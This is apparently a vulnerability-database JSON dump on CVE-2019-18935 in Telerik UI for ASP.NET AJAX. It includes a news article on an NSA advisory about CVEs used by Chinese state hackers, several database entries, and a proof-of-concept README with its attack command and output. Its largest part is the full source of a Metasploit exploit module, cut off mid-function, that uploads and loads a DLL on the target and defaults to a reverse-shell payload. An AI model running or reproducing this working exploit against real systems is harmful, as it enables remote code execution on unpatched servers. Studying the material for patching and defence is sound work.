"CVE-2019-1849", "CVE-2019-1860", "CVE-2019-1861", "CVE-2019-18935"], "modified": "2019-06-06T17:43:57", "id": "THREATPOST:D15D3ADBA9A153B33E9ADCC9E9D6E07D", "href": "https://threatpost.com/cisco-high-severity-bugs/145446/", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2020-10-22T15:51:14", "description": "Chinese state-sponsored cyberattackers are actively compromising U.S. targets using a raft of known security vulnerabilities \u2013 with a Pulse VPN flaw claiming the dubious title of \u201cmost-favored bug\u201d for these groups.\n\nThat\u2019s according to the National Security Agency (NSA), which released a \u201ctop 25\u201d list of the exploits that are used the most by China-linked advanced persistent threats (APT), which include the likes of [Cactus Pete](<https://threatpost.com/cactuspete-apt-toolset-respionage-targets/158350/>), [TA413,](<https://threatpost.com/chinese-apt-sepulcher-malware-phishing-attacks/158871/>) [Vicious Panda](<https://threatpost.com/coronavirus-apt-attack-malware/153697/>) and [Winniti](<https://threatpost.com/black-hat-linux-spyware-stack-chinese-apts/158092/>).\n\nThe Feds [warned in September](<https://threatpost.com/hackers-gov-microsoft-exchange-f5-exploits/159226/>) that Chinese threat actors had successfully compromised several government and private sector entities in recent months; the NSA is now driving the point home about the need to patch amid this flurry of heightened activity.[](<https://threatpost.com/newsletter-sign/>)\n\n\u201cMany of these vulnerabilities can be used to gain initial access to victim networks by exploiting products that are directly accessible from the internet,\u201d warned the NSA, in its Tuesday [advisory](<https://www.nsa.gov/News-Features/News-Stories/Article-View/Article/2387347/nsa-warns-chinese-state-sponsored-malicious-cyber-actors-exploiting-25-cves/>). \u201cOnce a cyber-actor has established a presence on a network from one of these remote exploitation vulnerabilities, they can use other vulnerabilities to further exploit the network from the inside.\u201d\n\nAPTs \u2013 Chinese and otherwise \u2013 have ramped up their cyberespionage efforts in the wake of the pandemic as well as in the leadup to the U.S. elections next month. But Chlo\u00e9 Messdaghi, vice president of strategy at Point3 Security, noted that these vulnerabilities contribute to an ongoing swell of attacks.\n\n\u201cWe definitely saw an increase in this situation last year and it\u2019s ongoing,\u201d she said. \u201cThey\u2019re trying to collect intellectual property data. Chinese attackers could be nation-state, could be a company or group of companies, or just a group of threat actors or an individual trying to get proprietary information to utilize and build competitive companies\u2026in other words, to steal and use for their own gain.\u201d\n\n## **Pulse Secure, BlueKeep, Zerologon and More**\n\nPlenty of well-known and infamous bugs made the NSA\u2019s Top 25 cut. For instance, a notorious Pulse Secure VPN bug (CVE-2019-11510) is the first flaw on the list.\n\nIt\u2019s an [arbitrary file-reading flaw](<https://www.tenable.com/blog/cve-2019-11510-critical-pulse-connect-secure-vulnerability-used-in-sodinokibi-ransomware>) that opens systems to exploitation from remote, unauthenticated attackers. In April of this year, the Department of Homeland Security\u2019s Cybersecurity and Infrastructure Security Agency (CISA) [warned that](<https://threatpost.com/dhs-urges-pulse-secure-vpn-users-to-update-passwords/154925/>) attackers are actively using the issue to steal passwords to infiltrate corporate networks. And in fact, this is the bug at the heart of the [Travelex ransomware fiasco](<https://threatpost.com/sodinokibi-ransomware-travelex-fiasco/151600/>) that hit in January.\n\nPulse Secure issued a patch in April 2019, but many companies impacted by the flaw still haven\u2019t applied it, CISA warned.\n\nAnother biggie for foreign adversaries is a critical flaw in F5 BIG-IP 8 proxy/load balancer devices ([CVE-2020-5902](<https://threatpost.com/thousands-f5-big-ip-users-takeover/157543/>)). This remote code-execution (RCE) bug exists in the Traffic Management User Interface (TMUI) of the device that\u2019s used for configuration. It allows complete control of the host machine upon exploitation, enabling interception and redirection of web traffic, decryption of traffic destined for web servers, and serving as a hop-point into other areas of the network.\n\nAt the end of June, F5 issued urgent patches the bug, which has a CVSS severity score of 10 out of 10 \u201cdue to its lack of complexity, ease of attack vector, and high impacts to confidentiality, integrity and availability,\u201d researchers said at the time. Thousands of devices were shown to be vulnerable in a Shodan search in July.\n\nThe NSA also flagged several vulnerabilities in Citrix as being Chinese faves, including CVE-2019-19781, which was revealed last holiday season. The bug exists in the Citrix Application Delivery Controller (ADC) and Gateway, a purpose-built networking appliance meant to improve the performance and security of applications delivered over the web. An exploit can lead to RCE without credentials.\n\nWhen it was originally disclosed in December, the vulnerability did not have a patch, and Citrix had to [scramble to push fixes out](<https://threatpost.com/citrix-patch-rollout-critical-rce-flaw/152041/>) \u2013 but not before public proof-of-concept (PoC) exploit code emerged, along with active exploitations and mass scanning activity for the vulnerable Citrix products.\n\nOther Citrix bugs in the list include CVE-2020-8193, CVE-2020-8195 and CVE-2020-8196.\n\nMeanwhile, Microsoft bugs are well-represented, including the [BlueKeep RCE bug](<https://threatpost.com/one-million-devices-open-to-wormable-microsoft-bluekeep-flaw/145113/>) in Remote Desktop Services (RDP), which is still under active attack a year after disclosure. The bug tracked as CVE-2019-0708 can be exploited by an unauthenticated attacker connecting to the target system using RDP, to send specially crafted requests and execute code. The issue with BlueKeep is that researchers believe it to be wormable, which could lead to a WannaCry-level disaster, they have said.\n\nAnother bug-with-a-name on the list is [Zerologon](<https://threatpost.com/ryuk-ransomware-gang-zerologon-lightning-attack/160286/>), the privilege-escalation vulnerability that allows an unauthenticated attacker with network access to a domain controller to completely compromise all Active Directory identity services. It was patched in August, but many organizations remain vulnerable, and the DHS recently [issued a dire warning](<https://threatpost.com/dire-patch-warning-zerologon/159404/>) on the bug amid a tsunami of attacks.\n\nThe very first bug ever reported to Microsoft by the NSA, CVE-2020-0601, is also being favored by Chinese actors. This spoofing vulnerability, [patched in January,](<https://threatpost.com/microsoft-patches-crypto-bug/151842/>) exists in the way Windows CryptoAPI (Crypt32.dll) validates Elliptic Curve Cryptography (ECC) certificates. An attacker could exploit the vulnerability by using a spoofed code-signing certificate to sign a malicious executable, making it appear that the file was from a trusted, legitimate source.\n\nTwo proof-of-concept (PoC) exploits were publicly released just a week after Microsoft\u2019s January Patch Tuesday security bulletin addressed the flaw.\n\nThen there\u2019s a high-profile Microsoft Exchange validation key RCE bug ([CVE-2020-0688](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0688>)), which stems from the server failing to properly create unique keys at install time.\n\nIt was fixed as part of Microsoft\u2019s [February Patch Tuesday](<https://threatpost.com/microsoft-active-attacks-air-gap-99-patches/152807/>) updates \u2013 and [admins in March were warned](<https://threatpost.com/microsoft-exchange-server-flaw-exploited-in-apt-attacks/153527/>) that unpatched servers are being exploited in the wild by unnamed APT actors. But as of Sept. 30, at least 61 percent of Exchange 2010, 2013, 2016 and 2019 servers [were still vulnerable](<https://threatpost.com/microsoft-exchange-exploited-flaw/159669/>) to the flaw.\n\n## **The Best of the Rest**\n\nThe NSA\u2019s Top 25 list covers plenty of ground, including a [nearly ubiquitous RCE bug](<https://threatpost.com/critical-microsoft-rce-bugs-windows/145572/>) (CVE-2019-1040) that, when disclosed last year, affected all versions of Windows. It allows a man-in-the-middle attacker to bypass the NTLM Message Integrity Check protection.\n\nHere\u2019s a list of the other flaws:\n\n * CVE-2018-4939 in certain Adobe ColdFusion versions.\n * CVE-2020-2555 in the Oracle Coherence product in Oracle Fusion Middleware.\n * CVE-2019-3396 in the Widget Connector macro in Atlassian Confluence Server\n * CVE-2019-11580 in Atlassian Crowd or Crowd Data Center\n * CVE-2020-10189 in Zoho ManageEngine Desktop Central\n * CVE-2019-18935 in Progress Telerik UI for ASP.NET AJAX.\n * CVE-2019-0803 in Windows, a privilege-escalation issue in the Win32k component\n * CVE-2020-3118 in the Cisco Discovery Protocol implementation for Cisco IOS XR Software\n * CVE-2020-8515 in DrayTek Vigor devices\n\nThe advisory also covers three older bugs: One in Exim mail transfer (CVE-2018-6789); one in Symantec Messaging Gateway (CVE-2017-6327); and one in the WLS Security component in Oracle WebLogic Server (CVE-2015-4852).\n\n\u201cWe hear loud and clear that it can be hard to prioritize patching and mitigation efforts,\u201d NSA Cybersecurity Director Anne Neuberger said in a media statement. \u201cWe hope that by highlighting the vulnerabilities that China is actively using to compromise systems, cybersecurity professionals will gain actionable information to prioritize efforts and secure their systems.\u201d\n", "cvss3": {}, "published": "2020-10-21T20:31:17", "type": "threatpost", "title": "Bug Parade: NSA Warns on Cresting China-Backed Cyberattacks", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2015-4852", "CVE-2017-6327", "CVE-2018-4939", "CVE-2018-6789", "CVE-2019-0708", "CVE-2019-0803", "CVE-2019-1040", "CVE-2019-11510", "CVE-2019-11580", "CVE-2019-18935", "CVE-2019-19781", "CVE-2019-3396", "CVE-2020-0601", "CVE-2020-0688", "CVE-2020-10189", "CVE-2020-2555", "CVE-2020-3118", "CVE-2020-5902", "CVE-2020-8193", "CVE-2020-8195", "CVE-2020-8196", "CVE-2020-8515"], "modified": "2020-10-21T20:31:17", "id": "THREATPOST:F8F0749C57FDD3CABE842BDFEAD33452", "href": "https://threatpost.com/bug-nsa-china-backed-cyberattacks/160421/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "veracode": [{"lastseen": "2022-07-27T10:08:23", "description": "telerik is vulnerable to remote code execution. A .NET JavaScriptSerializer Deserialization vulnerability through `RadAsyncUpload` allows an attacker to execute malicious code on the server in the context of the `w3wp.exe` process.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2020-06-25T09:22:09", "type": "veracode", "title": "Remote Code Execution", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-18935"], "modified": "2020-10-21T01:12:00", "id": "VERACODE:25767", "href": "https://sca.analysiscenter.veracode.com/vulnerability-database/security/1/1/sid-25767/summary", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "exploitpack": [{"lastseen": "2020-04-01T20:40:44", "description": "\nTelerik UI - Remote Code Execution via Insecure Deserialization", "edition": 2, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2019-12-18T00:00:00", "title": "Telerik UI - Remote Code Execution via Insecure Deserialization", "type": "exploitpack", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-18935"], "modified": "2019-12-18T00:00:00", "id": "EXPLOITPACK:AE2D3F648B410F57DC5F105EDA166E2B", "href": "", "sourceData": "See the full write-up at Bishop Fox, CVE-2019-18935: https://know.bishopfox.com/research/cve-2019-18935-remote-code-execution-in-telerik-ui, for a complete walkthrough of vulnerability and exploit details for this issue (along with patching instructions).\n\nInstall\ngit clone https://github.com/noperator/CVE-2019-18935.git && cd CVE-2019-18935\npython3 -m venv env\nsource env/bin/activate\npip3 install -r requirements.txt\n\nRequirements\nThis exploit leverages encryption logic from RAU_crypto. The RAUCipher class within RAU_crypto.py depends on PyCryptodome, a drop-in replacement for the dead PyCrypto module. PyCryptodome and PyCrypto create problems when installed in the same environment, so the best way to satisfy this dependency is to install the module within a virtual environment, as shown above.\n\nUsage\nCompile mixed mode assembly DLL payload\nIn a Windows environment with Visual Studio installed, use build_dll.bat to generate 32- and 64-bit mixed mode assembly DLLs to be used as a payload during deserialization.\n\nbuild_dll.bat sleep.c\nUpload and load payload into application via insecure deserialization\nPass the DLL generated above to CVE-2019-18935.py, which will upload the DLL to a directory on the target server (provided that the web server has write permissions) and then load that DLL into the application via the insecure deserialization exploit.\n\npython3 CVE-2019-18935.py -u <HOST>/Telerik.Web.UI.WebResource.axd?type=rau -v <VERSION> -f 'C:\\Windows\\Temp' -p sleep_2019121205271355_x86.dll\n[*] Local payload name: sleep_2019121205271355_x86.dll\n[*] Destination folder: C:\\Windows\\Temp\n[*] Remote payload name: 1576142987.918625.dll\n\n{'fileInfo': {'ContentLength': 75264,\n 'ContentType': 'application/octet-stream',\n 'DateJson': '1970-01-01T00:00:00.000Z',\n 'FileName': '1576142987.918625.dll',\n 'Index': 0},\n 'metaData': {'AsyncUploadTypeName': 'Telerik.Web.UI.UploadedFileInfo, '\n 'Telerik.Web.UI, Version=<VERSION>, '\n 'Culture=neutral, '\n 'PublicKeyToken=<TOKEN>',\n 'TempFileName': '1576142987.918625.dll'}}\n\n[*] Triggering deserialization...\n\n<title>Runtime Error</title>\n<span><H1>Server Error in '/' Application.<hr width=100% size=1 color=silver></H1>\n<h2> <i>Runtime Error</i> </h2></span>\n...omitted for brevity...\n\n[*] Response time: 13.01 seconds\nIn the example above, the application took at least 10 seconds to respond, indicating that the DLL payload successfully invoked Sleep(10000).\n\nThanks\n@mwulftange initially discovered this vulnerability. @bao7uo wrote all of the logic for breaking RadAsyncUpload encryption, which enabled manipulating the file upload configuration object in rauPostData and subsequently exploiting insecure deserialization of that object.\n\nProof of Concept:\nhttps://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/47793.zip", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "zdt": [{"lastseen": "2019-12-19T01:04:29", "description": "Exploit for asp platform in category web applications", "cvss3": {}, "published": "2019-12-18T00:00:00", "type": "zdt", "title": "Telerik UI - Remote Code Execution via Insecure Deserialization Exploit", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2019-18935"], "modified": "2019-12-18T00:00:00", "id": "1337DAY-ID-33683", "href": "https://0day.today/exploit/description/33683", "sourceData": "Telerik UI - Remote Code Execution via Insecure Deserialization Exploit\r\n\r\nSee the full write-up at Bishop Fox, CVE-2019-18935: https://know.bishopfox.com/research/cve-2019-18935-remote-code-execution-in-telerik-ui, for a complete walkthrough of vulnerability and exploit details for this issue (along with patching instructions).\r\n\r\nInstall\r\ngit clone https://github.com/noperator/CVE-2019-18935.git && cd CVE-2019-18935\r\npython3 -m venv env\r\nsource env/bin/activate\r\npip3 install -r requirements.txt\r\n\r\nRequirements\r\nThis exploit leverages encryption logic from RAU_crypto. The RAUCipher class within RAU_crypto.py depends on PyCryptodome, a drop-in replacement for the dead PyCrypto module. PyCryptodome and PyCrypto create problems when installed in the same environment, so the best way to satisfy this dependency is to install the module within a virtual environment, as shown above.\r\n\r\nUsage\r\nCompile mixed mode assembly DLL payload\r\nIn a Windows environment with Visual Studio installed, use build_dll.bat to generate 32- and 64-bit mixed mode assembly DLLs to be used as a payload during deserialization.\r\n\r\nbuild_dll.bat sleep.c\r\nUpload and load payload into application via insecure deserialization\r\nPass the DLL generated above to CVE-2019-18935.py, which will upload the DLL to a directory on the target server (provided that the web server has write permissions) and then load that DLL into the application via the insecure deserialization exploit.\r\n\r\npython3 CVE-2019-18935.py -u <HOST>/Telerik.Web.UI.WebResource.axd?type=rau -v <VERSION> -f 'C:\\Windows\\Temp' -p sleep_2019121205271355_x86.dll\r\n[*] Local payload name: sleep_2019121205271355_x86.dll\r\n[*] Destination folder: C:\\Windows\\Temp\r\n[*] Remote payload name: 1576142987.918625.dll\r\n\r\n{'fileInfo': {'ContentLength': 75264,\r\n 'ContentType': 'application/octet-stream',\r\n 'DateJson': '1970-01-01T00:00:00.000Z',\r\n 'FileName': '1576142987.918625.dll',\r\n 'Index': 0},\r\n 'metaData': {'AsyncUploadTypeName': 'Telerik.Web.UI.UploadedFileInfo, '\r\n 'Telerik.Web.UI, Version=<VERSION>, '\r\n 'Culture=neutral, '\r\n 'PublicKeyToken=<TOKEN>',\r\n 'TempFileName': '1576142987.918625.dll'}}\r\n\r\n[*] Triggering deserialization...\r\n\r\n<title>Runtime Error</title>\r\n<span><H1>Server Error in '/' Application.<hr width=100% size=1 color=silver></H1>\r\n<h2> <i>Runtime Error</i> </h2></span>\r\n...omitted for brevity...\r\n\r\n[*] Response time: 13.01 seconds\r\nIn the example above, the application took at least 10 seconds to respond, indicating that the DLL payload successfully invoked Sleep(10000).\r\n\r\nThanks\r\n@mwulftange initially discovered this vulnerability. @bao7uo wrote all of the logic for breaking RadAsyncUpload encryption, which enabled manipulating the file upload configuration object in rauPostData and subsequently exploiting insecure deserialization of that object.\r\n\r\nProof of Concept:\r\nhttps://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/47793.zip\n\n# 0day.today [2019-12-18] #", "sourceHref": "https://0day.today/exploit/33683", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2021-12-22T05:20:05", "description": "This Metasploit module exploits the .NET deserialization vulnerability within the RadAsyncUpload (RAU) component of Telerik UI ASP.NET AJAX that is identified as CVE-2019-18935. In order to do so the module must upload a mixed mode .NET assembly DLL which is then loaded through the deserialization flaw. Uploading the file requires knowledge of the cryptographic keys used by RAU. The default values used by this module are related to CVE-2017-11317, which once patched randomizes these keys. It is also necessary to know the version of Telerik UI ASP.NET that is running. This version number is in the format YYYY.#(.###)? where YYYY is the year of the release (e.g. 2020.3.915).", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2020-10-21T00:00:00", "type": "zdt", "title": "Telerik UI ASP.NET AJAX RadAsyncUpload Deserialization Exploit", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-18935", "CVE-2017-11317"], "modified": "2020-10-21T00:00:00", "id": "1337DAY-ID-35085", "href": "https://0day.today/exploit/description/35085", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ExcellentRanking\n\n prepend Msf::Exploit::Remote::AutoCheck\n include Msf::Exploit::Remote::HttpClient\n include Msf::Exploit::EXE\n include Msf::Exploit::FileDropper\n\n SALT = \"\\x3a\\x54\\x5b\\x19\\x0a\\x22\\x1d\\x44\\x3c\\x58\\x2c\\x33\\x01\".b\n # default keys per CVE-2017-11317\n DEFAULT_RAU_SIGNING_KEY = 'PrivateKeyForHashOfUploadConfiguration'.freeze\n DEFAULT_RAU_ENCRYPTION_KEY = 'PrivateKeyForEncryptionOfRadAsyncUploadConfiguration'.freeze\n CVE_2017_11317_REFERENCES = [\n ['CVE', '2017-11317'], # Unrestricted File Upload via Weak Encryption\n ['URL', 'https://github.com/bao7uo/RAU_crypto'],\n ['URL', 'https://www.telerik.com/support/kb/aspnet-ajax/upload-(async)/details/unrestricted-file-upload'],\n ['URL', 'https://github.com/straightblast/UnRadAsyncUpload/wiki'],\n ].freeze\n CVE_2019_18935_REFERENCES = [\n ['CVE', '2019-18935'], # Remote Code Execution via Insecure Deserialization\n ['URL', 'https://github.com/noperator/CVE-2019-18935'],\n ['URL', 'https://www.telerik.com/support/kb/aspnet-ajax/details/allows-javascriptserializer-deserialization'],\n ['URL', 'https://codewhitesec.blogspot.com/2019/02/telerik-revisited.html'],\n ['URL', 'https://labs.bishopfox.com/tech-blog/cve-2019-18935-remote-code-execution-in-telerik-ui'],\n ].freeze\n\n def initialize(info = {})\n super(\n update_info(\n info,\n 'Name' => 'Telerik UI ASP.NET AJAX RadAsyncUpload Deserialization',\n 'Description' => %q{\n This module exploits the .NET deserialization vulnerability within the RadAsyncUpload (RAU) component of Telerik\n UI ASP.NET AJAX that is identified as CVE-2019-18935. In order to do so the module must upload a mixed mode .NET\n assembly DLL which is then loaded through the deserialization flaw. Uploading the file requires knowledge of the\n cryptographic keys used by RAU. The default values used by this module are related to CVE-2017-11317, which once\n patched randomizes these keys. It is also necessary to know the version of Telerik UI ASP.NET that is running.\n This version number is in the format YYYY.#(.###)? where YYYY is the year of the release (e.g. '2020.3.915').\n },\n 'Author' => [\n 'Spencer McIntyre', # Metasploit module\n 'Paul Taylor', # (@bao7uo) Python PoCs\n 'Markus Wulftange', # (@mwulftange) discovery of CVE-2019-18935\n 'Caleb Gross', # (@noperator) research on CVE-2019-18935\n 'Alvaro Mu\u00f1oz', # (@pwntester) discovery of CVE-2017-11317\n 'Oleksandr Mirosh', # (@olekmirosh) discover of CVE-2017-11317\n 'straightblast', # (@straight_blast) discovery of CVE-2017-11317\n ],\n 'License' => MSF_LICENSE,\n 'References' => CVE_2017_11317_REFERENCES + CVE_2019_18935_REFERENCES,\n 'Platform' => 'win',\n 'Arch' => [ARCH_X86, ARCH_X64],\n 'Targets' => [['Windows', {}],],\n 'Payload' => { 'Space' => 2048 },\n 'DefaultOptions' => {\n 'PAYLOAD' => 'windows/x64/meterpreter/reverse_tcp',\n 'RPORT' => 443,\n 'SSL' => true\n },\n 'DefaultTarget' => 0,\n 'DisclosureDate' => '2019-12-09', # Telerik article on CVE-2019-18935\n 'Notes' => {\n 'Reliability' => [UNRELIABLE_SESSION],\n 'Stability' => [CRASH_SAFE],\n 'SideEffects' => [ARTIFACTS_ON_DISK, IOC_IN_LOGS]\n },\n 'Privileged' => true\n )\n )\n\n register_options([\n OptString.new('TARGETURI', [ true, 'The base path to the web application', '/' ]),\n OptString.new('FILE_NAME', [ false, 'The base file name for the upload (default will be random)' ]),\n OptString.new('DESTINATION', [ true, 'The destination folder for the upload', 'C:\\\\Windows\\\\Temp' ]),\n OptString.new('RAU_ENCRYPTION_KEY', [ true, 'The encryption key for the RAU configuration data', DEFAULT_RAU_ENCRYPTION_KEY ]),\n OptString.new('RAU_SIGNING_KEY', [ true, 'The signing key for the RAU configuration data', DEFAULT_RAU_SIGNING_KEY ]),\n OptString.new('VERSION', [ false, 'The Telerik UI ASP.NET AJAX version' ])\n ])\n end\n\n def dest_file_basename\n @dest_file_name = @dest_file_name || datastore['FILE_NAME'] || Rex::Text.rand_text_alphanumeric(rand(4..35)) + '.dll'\n end\n\n def check\n res = send_request_cgi({\n 'uri' => normalize_uri(target_uri.path, 'Telerik.Web.UI.WebResource.axd'),\n 'vars_get' => { 'type' => 'rau' }\n })\n return CheckCode::Safe unless res&.code == 200\n return CheckCode::Safe unless res.get_json_document&.dig('message') =~ /RadAsyncUpload handler is registered succesfully/\n\n if datastore['VERSION'].blank?\n @version = enumerate_version\n else\n begin\n upload_file('', datastore['VERSION'])\n rescue Msf::Exploit::Failed\n return CheckCode::Safe\n end\n\n @version = datastore['VERSION']\n end\n\n if [email\u00a0protected]? && datastore['RAU_SIGNING_KEY'] == DEFAULT_RAU_SIGNING_KEY && datastore['RAU_ENCRYPTION_KEY'] == DEFAULT_RAU_ENCRYPTION_KEY\n print_status('Server is using default crypto keys and is vulnerable to CVE-2017-11317')\n report_vuln({\n host: rhost,\n port: rport,\n proto: 'tcp',\n name: 'Unrestricted File Upload via Weak Encryption',\n refs: CVE_2017_11317_REFERENCES.map { |ctx_id, ctx_val| SiteReference.new(ctx_id, ctx_val) }\n })\n end\n\n # with custom errors enabled (which is the default), it's not possible to test for the serialization flaw without triggering it\n CheckCode::Detected\n end\n\n def exploit\n fail_with(Failure::BadConfig, 'No version was specified and it could not be enumerated') if @version.nil?\n upload_file(generate_payload_dll({ mixed_mode: true }), @version)\n execute_payload\n end\n\n def execute_payload\n print_status('Executing the payload...')\n serialized_object = { 'Path' => \"#{datastore['DESTINATION'].chomp('\\\\').gsub('\\\\', '/')}/#{dest_file_basename}.tmp\" }\n serialized_object_type = Msf::Util::DotNetDeserialization::Assemblies::VERSIONS['4.0.0.0']['System.Configuration.Install']['System.Configuration.Install.AssemblyInstaller']\n\n msg = rau_mime_payload(serialized_object, serialized_object_type.to_s)\n res = send_request_cgi(\n {\n 'uri' => normalize_uri(target_uri.path, 'Telerik.Web.UI.WebResource.axd'),\n 'vars_get' => { 'type' => 'rau' },\n 'method' => 'POST',\n 'data' => msg.to_s,\n 'ctype' => \"multipart/form-data; boundary=#{msg.bound}\"\n }, 5\n )\n # this request to execute the payload times out on success and returns 200 when it fails, for example because the\n # AllowedCustomMetaDataTypes setting is blocking the necessary code path\n fail_with(Failure::UnexpectedReply, 'Failed to execute the payload') if res&.code == 200\n end\n\n def upload_file(file_contents, version)\n target_folder = encrypt('')\n temp_target_folder = encrypt(datastore['DESTINATION'].encode('UTF-16LE'))\n if (version =~ /(\\d{4})\\.\\d+.\\d+/) && Regexp.last_match(1).to_i > 2016\n # signing is only necessary for versions >= 2017.1.118 (versions that don't match the regex don't require signing)\n target_folder << sign(target_folder)\n temp_target_folder << sign(temp_target_folder)\n end\n\n serialized_object = {\n 'TargetFolder' => target_folder,\n 'TempTargetFolder' => temp_target_folder,\n 'MaxFileSize' => 0,\n 'TimeToLive' => {\n 'Ticks' => 1440000000000,\n 'Days' => 0,\n 'Hours' => 40,\n 'Minutes' => 0,\n 'Seconds' => 0,\n 'Milliseconds' => 0,\n 'TotalDays' => 1.6666666666666665,\n 'TotalHours' => 40,\n 'TotalMinutes' => 2400,\n 'TotalSeconds' => 144000,\n 'TotalMilliseconds' => 144000000\n },\n 'UseApplicationPoolImpersonation' => false\n }\n serialized_object_type = \"Telerik.Web.UI.AsyncUploadConfiguration, Telerik.Web.UI, Version=#{version}, Culture=neutral, PublicKeyToken=121fae78165ba3d4\"\n\n msg = rau_mime_payload(serialized_object, serialized_object_type, file_contents: file_contents)\n res = send_request_cgi(\n {\n 'uri' => normalize_uri(target_uri.path, 'Telerik.Web.UI.WebResource.axd'),\n 'vars_get' => { 'type' => 'rau' },\n 'method' => 'POST',\n 'data' => msg.to_s,\n 'ctype' => \"multipart/form-data; boundary=#{msg.bound}\"\n }\n )\n fail_with(Failure::UnexpectedReply, 'The upload failed') unless res&.code == 200\n metadata = JSON.parse(decrypt(res.get_json_document.dig('metaData')).force_encoding('UTF-16LE'))\n dest_path = \"#{datastore['DESTINATION'].chomp('\\\\')}\\\\#{metadata['TempFileName']}\"\n print_good(\"Uploaded #{file_contents.length} bytes to: #{dest_path}\")\n register_file_for_cleanup(dest_path)\n end\n\n def rau_mime_payload(serialized_object, serialized_object_type, file_contents: '')\n metadata = { 'TotalChunks' => 1, 'ChunkIndex' => 0, 'TotalFileSize' => 1, 'UploadID' => dest_file_basename }\n\n post_data = Rex::MIME::Message.new\n post_data.add_part(encrypt(serialized_object.to_json.encode('UTF-16LE')) + '&' + encrypt(serialized_object_type.encode('UTF-16LE')), nil, nil, 'form-data; name=\"rauPostData\"')\n post_data.add_part(file_contents, 'application/octet-stream', 'binary', \"form-data; name=\\\"file\\\"; filename=\\\"#{dest_file_basename}\\\"\")\n post_data.add_part(dest_file_basename, nil, nil, 'form-data; name=\"fileName\"')\n post_data.add_part('application/octet-stream', nil, nil, 'form-data; name=\"contentType\"')\n post_data.add_part('1970-01-01T00:00:00.000Z', nil, nil, 'form-data; name=\"lastModifiedDate\"')\n post_data.add_part(metadata.to_json, nil, nil, 'form-data; name=\"metadata\"')\n post_data\n end\n\n def enumerate_version\n print_status('Enumerating the Telerik UI ASP.NET AJAX version, this will fail if the keys are incorrect')\n File.open(File.join(Msf::Config.data_directory, 'wordlists', 'telerik_ui_asp_net_ajax_versions.txt'), 'rb').each_line do |version|\n version.strip!\n next if version.start_with?('#')\n\n vprint_status(\"Checking version: #{version}\")\n begin\n upload_file('', version)\n rescue Msf::Exploit::Failed\n next\n end\n\n print_good(\"The Telerik UI ASP.NET AJAX version has been identified as: #{version}\")\n return version\n end\n\n nil\n end\n\n #\n # Crypto Functions\n #\n def get_cipher(mode)\n # older versions might need to use pbkdf1\n blob = OpenSSL::PKCS5.pbkdf2_hmac_sha1(datastore['RAU_ENCRYPTION_KEY'], SALT, 1000, 48)\n cipher = 